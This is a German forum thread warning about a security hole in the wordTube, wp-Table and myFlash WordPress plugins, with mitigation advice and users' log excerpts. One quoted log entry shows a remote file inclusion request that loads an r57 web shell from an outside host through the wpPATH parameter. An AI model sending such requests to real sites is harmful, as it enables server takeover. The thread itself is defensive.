Hallo,
nachdem in myGallery eine Sicherheitslücke entdeckt wurde, hat es auch meine Plugins erwischt. Leider,Leider ...
Ich empfehle jeden der WordTube,wp-Table oder myFlash nutzt, das Plugin entweder zu löschen, oder auf die aktuelle Version up zudaten.
Am Besten die Dateien :
wptable-button.php
wordtube-button.php
myflash-button.php
entfernen, dann kann auch nichts passieren. Die genauen Ausmassen kann ich noch nicht abschätzen.
ACHTUNG -Sicherheitsloch in wordTube und wp-table
-
-
- Gerade eben
- Anzeige
Hallo!
Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.
- ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
- ✔️ Deutsche Server & DSGVO-konform
- ✔️ Persönlicher Support (kein 0815-Ticket-System)
-
Aha, hatte mich schon über die Einträge im Logfile gewundert:
/wp-content/plugins/wp-table/js/wptable-button.phppKomisch auch das mit dem .phpp, stimmt das denn so überhaupt?
Als Useragent steht übrigens "libwww-perl/5.803" drin.Gruß
Ingo -
Dito, hab mich über ein paar 404'er gewundert, die von der wordtube-buttons.php mitsamt wpPATH-Insert kamen. Gerade mal auf die neueste Version aktualisiert.
Erklärt wenigstens, weshalb gestern AntiVir angesprungen ist, obwohl ich nur auf dem eigenen Blog war...
~fym
-
Haltet die Logfiles im Auge und sagt Bescheid falls es weiter Varianten gibt.
unsere lieben Hacker haben nämlich gerade erst Geschmack bekommen, ich weiss noch nicht welcher weiteren Varianten mit anderen Aufrufen auftauchen. Wer die Button.php löscht ist auf jeden Fall auf der sicheren Seite -
Kann man die einfach löschen?
-
Es funktioniert dann der TinyMCE Button des Plugin nicht mehr, aber ich denke Sicherheit geht vor...
Bin vielleicht etwas panisch, aber ich möchte nicht noch mehr Webseiten auf dem Gewissen haben...
Echter Schock -
Heise berichtet auch gerade über Sicherheitslöche...
Hier der Link zu Heise .Gruss benz
-
Hallo Alex, auch bei mir findet sich folgender Eintrag (ich habe ein paar Leerzeichen eingefügt) mehrmals in den Logfiles:
GET /wp-content/ plugins/ wordtube/ wordtube-button.php?wp PATH=http:// www dot treibball dot de/ components/ r57 dot txt? HTTP/1.1" 404 1042 "-""libwww-perl/5.79"
Ich benutze zum Glück keines der genannten Plugins.
Als ich gestern direkt auf die r57 txt bei treibball zugreifen wollte, hat mein Antivirus den Zugriff gestoppt.
Auf eine Suche nach wordtube-button bin ich hier gelandet...
und möchte doch allen empfehlen, die von Alex genannten Sicherheitsvorkehrungen zu treffen! -
Mich hat's schon erwischt. Zum Glück war es "nur" ein einfaches Defacement. Mein Bericht siehe hier :shock:
-
Hallo Alex, Danke für den Hinweis. Heise sagt, dass die neuesten Versionen von Wordtube und Myflash nicht betroffen sind. Kannst Du das bestätigen zum derzeitigen Zeitpunkt...?
Beste Grüße
Herr Nack -
Ich empfehle jeden der WordTube,wp-Table oder myFlash nutzt, das Plugin entweder zu löschen, oder auf die aktuelle Version up zudaten.
steht doch oben, Herr Nack ;)
vG
Arno
-
Dabei hab ich gar net gesoffn... :-|
Jetzt mitmachen!
Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!